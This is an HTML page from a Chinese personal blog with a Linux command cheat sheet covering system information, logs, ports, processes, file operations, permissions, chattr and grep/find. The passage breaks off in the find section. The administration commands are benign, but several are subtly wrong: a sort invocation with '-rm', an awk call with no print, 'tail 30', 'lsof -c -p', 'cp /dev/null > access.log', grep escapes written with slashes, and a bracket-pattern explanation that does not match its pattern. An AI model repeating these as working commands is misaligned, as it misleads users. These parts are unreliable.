<!DOCTYPE html>
<html lang="">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="x5-fullscreen" content="true">
<meta name="full-screen" content="yes">
<meta name="theme-color" content="#317EFB" />
<meta content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=0" name="viewport">
<meta name="keywords" content="">
<meta name="description" content="目录  1、系统信息查看2、关机、重启、登出3、系统日志4、端口查看5、进程查看6、文件和目录操作7、文件权限8、文件特殊属性9、文件搜索10、挂载11、用户和群组12、打包和压缩13、备份14、网络15、安装包管理  1.系统信息查看 查看处理器架构  arch、uname -m、lscpu  查看内核的版本   cat &#x2F;proc&#x2F;version、uname -r  查看系">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux常用命令">
<meta property="og:url" content="https://www.leagsoft.top/2022/07/31/Linux%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/index.html">
<meta property="og:site_name" content="一根儿狗">
<meta property="og:description" content="目录  1、系统信息查看2、关机、重启、登出3、系统日志4、端口查看5、进程查看6、文件和目录操作7、文件权限8、文件特殊属性9、文件搜索10、挂载11、用户和群组12、打包和压缩13、备份14、网络15、安装包管理  1.系统信息查看 查看处理器架构  arch、uname -m、lscpu  查看内核的版本   cat &#x2F;proc&#x2F;version、uname -r  查看系">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.leagsoft.top/img/linux.jpg">
<meta property="article:published_time" content="2022-07-31T03:33:03.066Z">
<meta property="article:modified_time" content="2022-08-13T05:11:31.497Z">
<meta property="article:author" content="WYK">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.leagsoft.top/img/linux.jpg">

<title>
    Linux常用命令
</title>

    <link rel="icon" type="image/png" sizes="16x16" href="https://www.leagsoft.top/favicon-16x16.png?v=1.0.2">


    <link rel="icon" type="image/png" sizes="32x32" href="https://www.leagsoft.top/favicon-32x32.png?v=1.0.2">


    <link rel="apple-touch-icon" sizes="180x180" href="https://www.leagsoft.top/apple-touch-icon.png?v=1.0.2">


    <link rel="manifest" href="https://www.leagsoft.top/site.webmanifest">

<link rel="preload" href="//at.alicdn.com/t/font_1518765_bkgx3wku6h4.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1518765_bkgx3wku6h4.css">


<link rel="stylesheet" href="https://www.leagsoft.top/css/plugins/bootstrap.min.css">
<link rel="stylesheet" href="https://www.leagsoft.top/css/plugins/locomotive-scroll.css">
<link rel="stylesheet" href="https://www.leagsoft.top/css/plugins/swiper.min.css">
<link rel="stylesheet" href="https://www.leagsoft.top/css/plugins/fancybox.min.css">
<link rel="stylesheet" href="https://www.leagsoft.top/css/plugins/font-awesome.min.css">


<!-- variable -->
<script>window.TYPED_TEXT=[
  "IT OPERATOR"
]</script>
<script>window.FAVICON={
  "icon16": "/favicon-16x16.png",
  "icon32": "/favicon-32x32.png",
  "appleTouchIcon": "/apple-touch-icon.png",
  "webmanifest": "/site.webmanifest",
  "visibilitychange": true,
  "hidden": "/favicon-16x16.png",
  "showText": "(*^_^*)哇哦！又好了！",
  "hideText": "≡(▔﹏▔)≡喔哟，崩溃啦！"
}</script>
<script>window.HTMEM_VERSION='1.0.2'</script>
<link data-theme-type="style-light" rel="stylesheet" href="https://www.leagsoft.top/css/style-light.css?v=1.0.2" id="trm-switch-style">
<link data-theme-type="style-dark" rel="stylesheet" href="https://www.leagsoft.top/css/style-dark.css?v=1.0.2" id="trm-switch-style">

<!-- theme css -->
<script>
    let themeMode = localStorage.getItem('theme-mode') === 'style-dark' ? 'style-light' : 'style-dark';
    let linkdom = document.querySelector('[data-theme-type='+themeMode+']');
    if(linkdom) linkdom.remove();
</script>

<!-- Site Analytics -->

    
        <!-- Baidu Analytics -->
        <script defer>
            var _hmt = _hmt || [];
            (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?a5cf6812dae46df7c99af752470c7c29";
            var s = document.getElementsByTagName("script")[0]; 
            s.parentNode.insertBefore(hm, s);
            })();
        </script>
     

    

    
 
<meta name="generator" content="Hexo 6.2.0"></head>

<body>

  <!-- app wrapper -->
  <div class="trm-app-frame">

    <!-- page preloader -->
    <div class="trm-preloader">
    <div class="trm-holder">
        <div class="preloader">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
</div>
    <!-- page preloader end -->

    <!-- change mode preloader -->
    <div class="trm-mode-swich-animation-frame">
    <div class="trm-mode-swich-animation"><i class="far fa-sun"></i>
        <div class="trm-horizon"></div>
        <i class="far fa-moon"></i>
    </div>
</div>
    <!-- change mode preloader end -->

      <!-- scroll container -->
      <div id="trm-dynamic-content" class="trm-swup-animation">
        <div id="trm-scroll-container" class="trm-scroll-container" data-scroll-container style="opacity: 0">
          <div data-scroll-section id="content" class="trm-scroll-section">
            <!-- top bar -->
            <div class="trm-top-bar" data-scroll data-scroll-sticky data-scroll-target="#content" data-scroll-offset="-10">
	<div class="container">
		<div class="trm-left-side">
			<!-- logo -->
			<a href="https://www.leagsoft.top/" class="trm-logo-frame trm-anima-link">
				<img src="https://www.leagsoft.top/logo.png" alt="logo">
				<div class="trm-logo-text">
					
					<span>一根儿狗</span>
				</div>
			</a>
			<!-- logo end -->
		</div>
		<div class="trm-right-side">

			<!-- menu -->
			<div class="trm-menu">
				<nav>
					<ul>
						
						<li class="menu-item-has-children ">
							<a  href="https://www.leagsoft.top/">
								首页
							</a>
							
						</li>
						
						<li class="menu-item-has-children ">
							<a  href="https://www.leagsoft.top/archives/">
								归档
							</a>
							
						</li>
						
						<li class="menu-item-has-children ">
							<a  href="https://www.leagsoft.top/links/">
								友链
							</a>
							
						</li>
						
						<li class="menu-item-has-children ">
							<a  href="https://www.leagsoft.top/about/">
								关于
							</a>
							
						</li>
						
					</ul>
				</nav>
			</div>
			<!-- menu end -->

			<!-- mode switcher place -->
			<div class="trm-mode-switcher-place"></div>
			<!-- mode switcher place end -->

		</div>
		<div class="trm-menu-btn">
			<span></span>
		</div>
	</div>
</div>
            <!-- top bar end -->

            <!-- body -->
            <div class="trm-content-start">

    <!-- banner -->
    <div class="trm-banner" data-scroll data-scroll-direction="vertical">
    <!-- banner cover -->
    <img src="https://pic1.zhimg.com/v2-b3c2c6745b9421a13a3c4706b19223b3_r.jpg?source=1940ef5c" alt="banner" class="trm-banner-cover" data-scroll data-scroll-direction="vertical" data-scroll-speed="-3">
    <!-- banner cover end -->

    <!-- banner slideshow cover-->
    <!-- <div class="swiper-container trm-slideshow" data-scroll data-scroll-direction="vertical" data-scroll-speed="-4">
        <div class="swiper-wrapper">
            <div class="swiper-slide"><img src="/img/blog/b1.jpg" alt="banner" class="trm-banner-cover" data-swiper-parallax-y="-200" data-swiper-parallax-scale="1.2"></div>
            <div class="swiper-slide"><img src="/img/blog/b2.jpg" alt="banner" class="trm-banner-cover" data-swiper-parallax-y="-200" data-swiper-parallax-scale="1.2"></div>
            <div class="swiper-slide"><img src="/img/blog/b3.jpg" alt="banner" class="trm-banner-cover" data-swiper-parallax-y="-200" data-swiper-parallax-scale="1.2"></div>
        </div>
    </div> -->
    <!-- banner slideshow cover end -->

    <!-- banner video cover -->
    <!-- <video autoplay="autoplay" loop muted playsinline webkit-playinginline class="trm-banner-cover" data-scroll data-scroll-direction="vertical" data-scroll-speed="-4">
        <source src="img/banner.mp4" type='video/mp4; codecs="avc1.42E01E, mp4a.40.2"'>
        <source src="img/banner.webm" type='video/webm; codecs="vp8, vorbis"'>
        <source src="img/banner.ogg" type='video/ogg; codecs="theora, vorbis"'>
        Your browser does not support HTML5 video.
    </video> -->
    <!-- banner video cover end -->

    <!-- banner cover end -->

    <!-- banner content -->
    <div class="trm-banner-content trm-overlay">
        <div class="container" data-scroll data-scroll-direction="vertical" data-scroll-speed="0">
            <div class="row">
                <div class="col-lg-4"></div>
                <div class="col-lg-8">

                    <!-- banner title -->
                    <div class="trm-banner-text">
                        <div class="trm-label trm-mb-20">
                            NEWS LETTER
                        </div>
                        <h1 class="trm-mb-30 trm-hsmb-font">
                            Linux常用命令
                        </h1>

                        
                            <ul class="trm-breadcrumbs trm-label">
                                <li>
                                    <a href="https://www.leagsoft.top/" class="trm-anima-link">Home</a>
                                </li>
                                <li>
                                    <span>
                                        2022
                                    </span
                                ></li>
                            </ul>
                        
                    </div>
                    <!-- banner title end -->

                    <!-- scroll hint -->
                    <a href="#about-triger" data-scroll-to="#about-triger" data-scroll-offset="-130" class="trm-scroll-hint-frame">
                        <div class="trm-scroll-hint"></div>
                        <span class="trm-label">Scroll down</span>
                    </a>
                    <!-- scroll hint end -->

                </div>
            </div>
        </div>
    </div>
    <!-- banner content end -->
</div>
    <!-- banner end -->

    <div class="container">
        <div class="row">
            <div class="col-lg-4">
                <!-- main card -->
                <div class="trm-main-card-frame trm-sidebar">
    <div class="trm-main-card" data-scroll data-scroll-repeat data-scroll-sticky data-scroll-target="#content" data-scroll-offset="60">
        <!-- card header -->
        <div class="trm-mc-header">
            <div class="trm-avatar-frame trm-mb-20"><img class="trm-avatar" src="https://www.leagsoft.top/avatar.jpg" alt="Avatar"> </div>
            <h5 class="trm-name trm-mb-15">
                一根儿狗
            </h5>
            <div class="trm-label">
                I`m
                <span class="trm-typed-text">
                    <!-- Words for theme.user.typedText -->
                </span>
            </div>
        </div>
        <!-- card header end -->
        <div class="trm-divider trm-mb-40 trm-mt-40"></div>
        <!-- sidebar social -->
        <div class="trm-social">
            
                <a href="https://github.com" rel="nofollow" target="_blank">
                    <i class="fab fa-github"></i>
                </a>
            
                <a href="https://weibo.com/" rel="nofollow" target="_blank">
                    <i class="iconfont cg-weibo"></i>
                </a>
            
        </div>
        <!-- sidebar social end -->
        <div class="trm-divider trm-mb-40 trm-mt-40"></div>
        <!-- info -->
        <ul class="trm-table trm-mb-20">
            
                <li>
                    <div class="trm-label">
                        Residence:
                    </div>
                    <div class="trm-label trm-label-light">
                        JiNan
                    </div>
                </li>
            
                <li>
                    <div class="trm-label">
                        City:
                    </div>
                    <div class="trm-label trm-label-light">
                        ShanDong
                    </div>
                </li>
            
                <li>
                    <div class="trm-label">
                        Age:
                    </div>
                    <div class="trm-label trm-label-light">
                        25
                    </div>
                </li>
            
        </ul>
        
        <!-- info end -->
        <div class="trm-divider trm-mb-40 trm-mt-40"></div>
        <!-- action button -->
        <div class="text-center">
            <a href="mailto:255361619@qq.com" class="trm-btn">
                Contact Me
                <i class="far fa-envelope"></i>
            </a>
        </div>
        <!-- action button end -->
        
    </div>
</div>
                <!-- main card end -->
            </div>
            <div class="col-lg-8">
                <!-- content -->
                <div class="trm-content" id="trm-content">
                    <div data-scroll data-scroll-repeat data-scroll-offset="500" id="about-triger"></div>
                    
                    <div class="row">
                        <div class="col-lg-4">
                            <div class="trm-card trm-label trm-label-light text-center"><i class="far fa-calendar-alt trm-icon"></i><br>
                                07/31
                            </div>
                        </div>
                        <div class="col-lg-4">
                            <div class="trm-card trm-label trm-label-light text-center"><i class="far fa-clock trm-icon"></i><br>
                                11:33
                            </div>
                        </div>
                        <div class="col-lg-4">
                            <div class="trm-card trm-label trm-label-light text-center"><i class="far fa-user trm-icon"></i><br>
                                一根儿狗
                            </div>
                        </div>
                    </div>

                    <article class="trm-card trm-publication">
                        <p><strong>目录</strong></p>
<hr>
<p><strong>1、系统信息查看</strong><br><strong>2、关机、重启、登出</strong><br><strong>3、系统日志</strong><br><strong>4、端口查看</strong><br><strong>5、进程查看</strong><br><strong>6、文件和目录操作</strong><br><strong>7、文件权限</strong><br><strong>8、文件特殊属性</strong><br><strong>9、文件搜索</strong><br><strong>10、挂载</strong><br><strong>11、用户和群组</strong><br><strong>12、打包和压缩</strong><br><strong>13、备份</strong><br><strong>14、网络</strong><br><strong>15、安装包管理</strong></p>
<hr>
<h1 id="1-系统信息查看"><a href="#1-系统信息查看" class="headerlink" title="1.系统信息查看"></a>1.<strong>系统信息查看</strong></h1><ul>
<li><p>查看处理器架构 </p>
<p>arch、uname -m、lscpu</p>
</li>
<li><p>查看内核的版本  </p>
<p>cat &#x2F;proc&#x2F;version、uname -r</p>
</li>
<li><p>查看系统版本信息</p>
<p> cat &#x2F;etc&#x2F;redhat-release（只适合Redhat系）、lsb_release -a、cat &#x2F;etc&#x2F;issue</p>
</li>
<li><p>查看设备重启记录、用户登录记录 </p>
<p>last -f wtmp</p>
</li>
<li><p>查看CPU 信息 </p>
<p>cat &#x2F;proc&#x2F;cpuinfo、lscpu</p>
</li>
<li><p>查看CPU 型号 </p>
<p>cat &#x2F;proc&#x2F;cpuinfo |grep name |cut -f2 -d : |uniq -c</p>
</li>
<li><p>查看占用cpu资源最多的10个进程 </p>
<p>ps aux | head -1;ps aux | sort -rm -k +4 | head</p>
</li>
<li><p>查看内存信息 </p>
<p>free -m、cat &#x2F;proc&#x2F;meminfo</p>
</li>
<li><p>查看占用内存高的三十个进程  </p>
<p>ps aux ｜awk ‘{$6&#x2F;1024 “MB\t\t” $11}’ | sort -n | tail 30</p>
</li>
<li><p>查看硬盘和分区信息 </p>
<p>lsblk、fdisk -l</p>
</li>
<li><p>查看10秒内每秒的磁盘占用 </p>
<p>iostat(需安装) -x 1 10</p>
</li>
<li><p>查看网卡信息 </p>
<p>lspci | grep -i ethernet</p>
</li>
<li><p>查看显卡信息 </p>
<p>lspci | grep -i vga</p>
</li>
<li><p>罗列 PCI 设备 </p>
<p>lspci -tv</p>
</li>
<li><p>查看 USB 设备 </p>
<p>lsusb -tv（需安装usbutils）</p>
</li>
<li><p>查看系统日期 </p>
<p>date </p>
</li>
<li><p>查看哪些swap被使用 </p>
<p>cat &#x2F;proc&#x2F;swaps</p>
</li>
<li><p>查看网络适配器及统计 </p>
<p>cat &#x2F;proc&#x2F;net&#x2F;dev</p>
</li>
<li><p>查看已加载的文件系统</p>
<p> cat &#x2F;proc&#x2F;mounts</p>
</li>
</ul>
<h1 id="2-关机、重启及登出"><a href="#2-关机、重启及登出" class="headerlink" title="2.关机、重启及登出"></a>2.<strong>关机、重启及登出</strong></h1><ul>
<li>关机 shutdown -h now、init 0 、telinit 0 </li>
<li>重启 shutdown -r now、reboot</li>
<li>按预定时间关机  shutdown -h hours:minutes</li>
<li>取消按预定时间关机 shutdown -c</li>
<li>注销 logout</li>
</ul>
<h1 id="3-系统日志"><a href="#3-系统日志" class="headerlink" title="3.系统日志"></a><strong>3.系统日志</strong></h1><ul>
<li><p><strong>&#x2F;var&#x2F;log&#x2F;messages</strong><br>主要存放系统日志。记录linux内核消息及各种应用程序的公共日志信息，包括启动、IO错误、网络错误、程序故障等。对于未使用独立日志文件的应用程序或服务，一般都可以从该文件获得相关的事件记录信息。</p>
</li>
<li><p><strong>&#x2F;var&#x2F;log&#x2F;cron</strong><br>crond计划任务，和crontab不可分割，crontab是执行命令<br>记录crond计划任务产生的事件信息</p>
</li>
<li><p><strong>&#x2F;var&#x2F;log&#x2F;secure</strong><br>记录验证与授权信息，例如sshd会将所有信息记录在此</p>
</li>
<li><p><strong>&#x2F;var&#x2F;log&#x2F;lastlog</strong><br>记录系统中所有用户最后一次登录的日志，此文件是二进制文件，不能直接cat、vi查看，需要使用lastlog命令查看</p>
</li>
<li><p><strong>&#x2F;var&#x2F;log&#x2F;utmp</strong><br>记录当前登录的每个用户的详细信息，此文件是二进制信息，不能直接cat、vi，需要使用w，who命令查看</p>
</li>
<li><p><strong>&#x2F;var&#x2F;log&#x2F;wtmp</strong><br>永久记录所有用户的登录、注销信息，同时记录系统的启动、重启、关机事件。此文件是二进制文件，不能直接cat、vi查看，需要使用last命令查看（last -f 指定文件路径）</p>
</li>
</ul>
<h1 id="4-端口查看"><a href="#4-端口查看" class="headerlink" title="4.端口查看"></a><strong>4.端口查看</strong></h1><h2 id="4-1-netstat"><a href="#4-1-netstat" class="headerlink" title="4.1 netstat"></a>4.1 netstat</h2><p>-a     –列出所有端口<br>-at   –列出所有tcp端口<br>-au  –列出所有udp端口<br>-l     –列出处于监听状态的端口<br>-lt    –所有监听状态的tcp端口<br>       –udp同理同上<br>-s    –显示网络统计信息<br>-st   –tcp<br>-su  –udp<br>-p    –显示PID和进程名称<br>-n   –不显示主机、端口和用户名，用数字代替<br>-i      –显示网络接口列表<br>-ie   –显示详细信息，像ifconfig<br>-r     –显示路由表</p>
<h2 id="4-2-ss"><a href="#4-2-ss" class="headerlink" title="4.2 ss"></a>4.2 ss</h2><p>比netstat更快</p>
<p>-h –help 帮助<br>-V –version  显示版本号<br>-t –tcp 显示 TCP 协议的 sockets<br>-u –udp 显示 UDP 协议的 sockets<br>-x –unix 显示 unix domain sockets，与 -f 选项相同<br>-n –numeric 不解析服务的名称，如 “22” 端口不会显示成 “ssh”<br>-l –listening 只显示处于监听状态的端口<br>-p –processes 显示监听端口的进程(Ubuntu 上需要 sudo)<br>-a –all 对 TCP 协议来说，既包含监听的端口，也包含建立的连接<br>-r –resolve 把 IP 解释为域名，把端口号解释为协议名称</p>
<h2 id="4-3-lsof"><a href="#4-3-lsof" class="headerlink" title="4.3 lsof"></a>4.3 lsof</h2><p>lsof 常见的用法是查找应用程序打开的文件的名称和数目。</p>
<ul>
<li><p>查看8080端口占用情况  </p>
<p>lsof -i :8080</p>
</li>
<li><p>显示开启文件abc.txt的进程  </p>
<p>lsof  abc.txt</p>
</li>
<li><p>显示abc进程现在打开的文件 </p>
<p>lsof -c abc</p>
</li>
<li><p>列出进程号为1234的进程所打开的文件</p>
<p> lsof -c -p 1234</p>
</li>
<li><p>显示归属gid的进程情况  </p>
<p>lsof -g gid</p>
</li>
<li><p>显示目录下被进程开启的文件  </p>
<p>lsof +d &#x2F;usr&#x2F;local&#x2F;</p>
</li>
</ul>
<h1 id="5-进程查看"><a href="#5-进程查看" class="headerlink" title="5.进程查看"></a>5.进程查看</h1><h2 id="5-1-ps"><a href="#5-1-ps" class="headerlink" title="5.1 ps"></a>5.1 ps</h2><p>a：显示一个终端的所有进程，除会话引线外；<br>u：显示进程的归属用户及内存的使用情况；<br>x：显示没有控制终端的进程；<br>-l：长格式显示更加详细的信息；<br>-e：显示所有进程；<br>-f ：用ASCII字符显示树状结构，表达程序间的相互关系</p>
<p>常用</p>
<ul>
<li>ps -aux | grep root</li>
<li>ps aux |  grep root </li>
<li>ps -ef  | grep java</li>
</ul>
<h2 id="5-2-pstree"><a href="#5-2-pstree" class="headerlink" title="5.2 pstree"></a>5.2 pstree</h2><p>用ASCII字符显示树状结构，清楚地表达程序间的相互关系。</p>
<h2 id="5-3-jobs"><a href="#5-3-jobs" class="headerlink" title="5.3 jobs"></a>5.3 jobs</h2><p>jobs查看后台进程<br>命令或脚本  命令行后加 &amp;  表示放到后台运行<br>jobs查看后台运行的进程<br>kill 时进程号前加%<br>正在前台运行的进程  ctrl+Z 进入暂停状态并放入后台<br>bg %进程号     放入后台继续运行<br>fg  %进程号     放入前台继续运行<br>disown  从table中移除一个job<br>-h  不从table中移除job，设置为不接受shell发送的sighub信号<br>-a   如果不指定id，针对所有job删除<br>-r    如果不指定id，只对running状态进行删除</p>
<h1 id="6-文件和目录操作"><a href="#6-文件和目录操作" class="headerlink" title="6.文件和目录操作"></a><strong>6.文件和目录操作</strong></h1><h2 id="6-1-ls"><a href="#6-1-ls" class="headerlink" title="6.1 ls"></a>6.1 ls</h2><ul>
<li><p>查看目录中的文件  </p>
<p>ls</p>
</li>
<li><p>显示文件和目录的详细资料  </p>
<p>ls -l</p>
</li>
<li><p>显示隐藏文件 </p>
<p>ls -a</p>
</li>
</ul>
<h2 id="6-2-cd"><a href="#6-2-cd" class="headerlink" title="6.2 cd"></a>6.2 cd</h2><ul>
<li><p>进入 ‘&#x2F; home’ 目录 </p>
<p>cd &#x2F;home </p>
</li>
<li><p>返回上一级目录  </p>
<p>cd .. </p>
</li>
<li><p>返回上两级目录 </p>
<p>cd ..&#x2F;.. </p>
</li>
<li><p>返回上次所在的目录 </p>
<p>cd -</p>
</li>
</ul>
<h2 id="6-3-pwd"><a href="#6-3-pwd" class="headerlink" title="6.3 pwd"></a>6.3 pwd</h2><ul>
<li><p>显示工作路径  </p>
<p>pwd</p>
</li>
</ul>
<h2 id="6-4-mkdir"><a href="#6-4-mkdir" class="headerlink" title="6.4 mkdir"></a>6.4 mkdir</h2><ul>
<li><p>创建一个叫做 ‘dir1’ 的目录 </p>
<p>mkdir dir1</p>
</li>
<li><p>同时创建两个目录  </p>
<p>mkdir dir1 dir2 </p>
</li>
<li><p>创建一个目录树  </p>
<p>mkdir -p &#x2F;tmp&#x2F;dir1&#x2F;dir2</p>
</li>
</ul>
<h2 id="6-5-rm"><a href="#6-5-rm" class="headerlink" title="6.5 rm"></a>6.5 rm</h2><ul>
<li><p>删除一个叫做 ‘file1’ 的文件 </p>
<p>rm -f file1 </p>
</li>
<li><p>删除一个叫做 ‘dir1’ 的目录并同时删除其内容</p>
<p> rm -rf dir1</p>
</li>
</ul>
<h2 id="6-6-rmdir"><a href="#6-6-rmdir" class="headerlink" title="6.6 rmdir"></a>6.6 rmdir</h2><ul>
<li><p>删除一个叫做 ‘dir1’ 的目录 </p>
<p>rmdir dir1</p>
</li>
</ul>
<h2 id="6-7-cp"><a href="#6-7-cp" class="headerlink" title="6.7 cp"></a>6.7 cp</h2><ul>
<li><p>复制一个文件 </p>
<p>cp file1 file2 </p>
</li>
<li><p>复制dir目录下的所有文件到当前工作目录 </p>
<p>cp dir&#x2F;* . </p>
</li>
<li><p>复制一个目录到当前工作目录 </p>
<p>cp -a &#x2F;tmp&#x2F;dir1 . </p>
</li>
<li><p>复制一个目录</p>
<p> cp -a dir1 dir2 </p>
</li>
<li><p>复制一个目录及子目录 </p>
<p>cp -r dir1 dir2</p>
</li>
</ul>
<h2 id="6-8-mv"><a href="#6-8-mv" class="headerlink" title="6.8 mv"></a>6.8 mv</h2><ul>
<li><p>重命名&#x2F;移动 一个目录 </p>
<p>mv dir1 new_dir</p>
</li>
</ul>
<h2 id="6-9-ln"><a href="#6-9-ln" class="headerlink" title="6.9 ln"></a>6.9 ln</h2><ul>
<li><p>创建一个指向文件或目录的软链接  </p>
<p>ln -s file1 lnk1 </p>
</li>
<li><p>创建一个指向文件或目录的物理链接</p>
<p> ln file1 lnk1</p>
</li>
</ul>
<h2 id="6-10-scp"><a href="#6-10-scp" class="headerlink" title="6.10 scp"></a>6.10 scp</h2><p>scp [可选参数] file_source file_target </p>
<ul>
<li><p>从本地复制到远程服务器的&#x2F;home&#x2F;目录</p>
<p>scp  1.txt <a href="mailto:&#114;&#x6f;&#x6f;&#x74;&#x40;&#49;&#x2e;&#x31;&#46;&#49;&#46;&#49;">&#114;&#x6f;&#x6f;&#x74;&#x40;&#49;&#x2e;&#x31;&#46;&#49;&#46;&#49;</a>:&#x2F;home&#x2F;</p>
</li>
<li><p>从远程复制到本地</p>
<p>scp  <a href="mailto:&#114;&#111;&#111;&#116;&#64;&#x31;&#x2e;&#x31;&#x2e;&#x31;&#46;&#49;">&#114;&#111;&#111;&#116;&#64;&#x31;&#x2e;&#x31;&#x2e;&#x31;&#46;&#49;</a>:&#x2F;home&#x2F;tmp&#x2F;1.txt &#x2F;home&#x2F;tmp</p>
</li>
</ul>
<h2 id="6-11-diff"><a href="#6-11-diff" class="headerlink" title="6.11 diff"></a>6.11 diff</h2><h2 id="6-12-清空文件"><a href="#6-12-清空文件" class="headerlink" title="6.12 清空文件"></a>6.12 清空文件</h2><ul>
<li><p>true命名</p>
<p>true &gt; access.log</p>
<p>‘’:’’ 符号，shell的内置命令，等同于true，用来作为no-op（不进行任何操作）</p>
<p>: &gt; access.log</p>
</li>
<li><p>使用cat、cp、dd命令操作&#x2F;dev&#x2F;null设备</p>
<p>cat &#x2F;dev&#x2F;null &gt; access.log</p>
<p>cp &#x2F;dev&#x2F;null &gt; access.log</p>
<p>dd if&#x3D;&#x2F;dev&#x2F;null of&#x3D;access.log【if代表输入、of代表输出】</p>
</li>
<li><p>使用echo命令将空字符串重定向到文件</p>
<p>echo “ “ &gt; access.log</p>
<p>echo &gt; access.log</p>
<p>以上将有空白字符</p>
<p>echo -n “ “ &gt;  access.log</p>
</li>
<li><p>truncate</p>
<p>将一个文件缩小或者扩展到某个给定的大小</p>
<p>文件大小设定为0</p>
<p>truncate -s 0 access.log</p>
</li>
</ul>
<h2 id="6-13查看大文件"><a href="#6-13查看大文件" class="headerlink" title="6.13查看大文件"></a>6.13查看大文件</h2><ul>
<li><p>du<br>查看目录下所有文件大小<br>du -x -h –max-depth&#x3D;1 </p>
<p>查看存储已达G的文件<br>du -x -h –max-depth&#x3D;1 | grep &#39;G&#39;</p>
<p>查看存储已达G的文件，并排序<br>du -x -h –max-depth&#x3D;1 | grep &#39;G&#39; | sort -nr</p>
</li>
</ul>
<h1 id="7-文件权限"><a href="#7-文件权限" class="headerlink" title="7.文件权限"></a>7.文件权限</h1><h2 id="7-1-chmod"><a href="#7-1-chmod" class="headerlink" title="7.1 chmod"></a>7.1 chmod</h2><p>修改用户的权限</p>
<p>文件基本权限有九个，分别是 <strong>owner&#x2F;group&#x2F;others(拥有者&#x2F;组&#x2F;其他)</strong> 三种身份各有自己的 <strong>read&#x2F;write&#x2F;execute</strong> 权限。</p>
<p>文件的权限字符为：  <strong>-rwxrwxrwx</strong> </p>
<ul>
<li><p>r:4</p>
</li>
<li><p>w:2</p>
</li>
<li><p>x:1</p>
</li>
<li><p>将&#x2F;bin&#x2F;file1文件所有的权限都设定启用</p>
</li>
</ul>
<p>chmod 777 &#x2F;bin&#x2F;file1</p>
<h2 id="7-2-chown"><a href="#7-2-chown" class="headerlink" title="7.2 chown"></a>7.2 chown</h2><p>更改用户所属用户与组</p>
<ul>
<li><p>改变一个文件的所有人属性  </p>
<p>chown user1 file1 </p>
</li>
<li><p>改变一个目录的所有人属性并同时改变改目录下所有文件的属性  </p>
<p>chown -R user1 directory1 </p>
</li>
<li><p>改变一个文件的所有人和群组属性  </p>
<p>chown user1:group1 file1</p>
</li>
</ul>
<h2 id="7-3-chgrp"><a href="#7-3-chgrp" class="headerlink" title="7.3 chgrp"></a>7.3 chgrp</h2><p>更改文件所属组</p>
<ul>
<li><p>改变文件的群组 </p>
<p>chgrp group1 file1</p>
</li>
</ul>
<h1 id="8-文件特殊属性"><a href="#8-文件特殊属性" class="headerlink" title="8.文件特殊属性"></a>8.文件特殊属性</h1><ul>
<li><p>只允许以追加方式读写文件 </p>
<p>chattr +a file1</p>
</li>
<li><p>在进行文件系统备份时，dump程序将忽略这个文件  </p>
<p>chattr +d file1 </p>
</li>
<li><p>设置成不可变的文件，不能被删除、修改、重命名或者链接 </p>
<p>chattr +i file1 </p>
</li>
<li><p>一旦应用程序对这个文件执行了写操作，使系统立刻把修改的结果写到磁盘  </p>
<p>chattr +S file1 </p>
</li>
<li><p>若文件被删除，系统会允许你在以后恢复这个被删除的文件</p>
</li>
</ul>
<p>  chattr +u file1 </p>
<ul>
<li><p>显示特殊的属性 </p>
<p> lsattr</p>
</li>
</ul>
<h1 id="9-文件搜索"><a href="#9-文件搜索" class="headerlink" title="9.文件搜索"></a>9.文件搜索</h1><h2 id="9-1-grep"><a href="#9-1-grep" class="headerlink" title="9.1 grep"></a>9.1 grep</h2><ul>
<li><p>grep -[acinv]  ‘搜索内容串’  filename</p>
<p>-a 以文本文件方式搜索</p>
<p>-c 计算找到的符合行的次数</p>
<p>-i 忽略大小写</p>
<p>-n 顺便输出行号</p>
<p>-v 反向选择，即显示不包含匹配文本的所有行</p>
</li>
<li><p>grep正则表达式元字符集（基本集）</p>
<p>^ 行的开始  如：’^grep’匹配所有以grep开头的行。</p>
<p>$ 行的结束 如：’grep$’匹配所有以grep结尾的行。</p>
<p>. 匹配一个非换行符的字符 如：’gr.p’匹配gr后接一个任意字符，然后是p。</p>
<p>*匹配零个或多个先前字符 如：’grep’匹配所有一个或多个空格后紧跟grep的行。</p>
<p>.*一起用代表任意字符。</p>
<p>[] 匹配一个指定范围内的字符，如’[Gg]rep’匹配Grep和grep。</p>
<p>[^] 匹配一个不在指定范围内的字符，如：’[^A-FH-Z]rep’匹配不包含A-R和T-Z的一个字母开头，紧跟rep的行。</p>
<p>&#x2F;(..&#x2F;) 标记匹配字符，如’&#x2F;(love&#x2F;)’，love被标记为1。</p>
<p>&#x2F;&lt; 锚定单词的开始</p>
<p>&#x2F;&gt; 锚定单词的结束，如’grep&#x2F;&gt;’匹配包含以grep结尾的单词的行。</p>
<p>例：</p>
</li>
<li><p>统计所有以“us”字符开头的行有多少 </p>
<p>grep -c “us” test.txt </p>
</li>
<li><p>不区分大小写查找“May”所有的行 </p>
<p>grep -i “May” test.txt </p>
</li>
<li><p>显示行号；显示匹配字符“user”的行及行号</p>
<p>grep -n “user” test.txt </p>
</li>
<li><p>显示输出没有字符“user”所有的行</p>
<p>grep -v “user” test.txt </p>
</li>
<li><p>显示输出字符“user”所在的行</p>
<p>grep “user” test.txt </p>
</li>
<li><p>搜索有the的行,并输出行号</p>
<p>grep -n ‘the’ regular_express.txt</p>
</li>
<li><p>搜 索没有the的行,并输出行号</p>
<p>grep -nv ‘the’ regular_express.txt</p>
</li>
</ul>
<h2 id="9-2-find"><a href="#9-2-find" class="headerlink" title="9.2 find"></a>9.2 find</h2><ul>
<li><p>从 ‘&#x2F;‘ 开始进入根文件系统搜索文件和目录  </p>
<p>find &#x2F; -name file1 </p>
</li>
<li><p>搜索属于用户 ‘user1’ 的文件和目录  </p>
<p>find &#x2F; -user user1 </p>
</li>
<li><p>在目录 ‘&#x2F; home&#x2F;user1’ 中搜索带有’.bin’ 结尾的文件 </p>
<p> find &#x2F;home&#x2F;user1 -name *.bin </p>
</li>
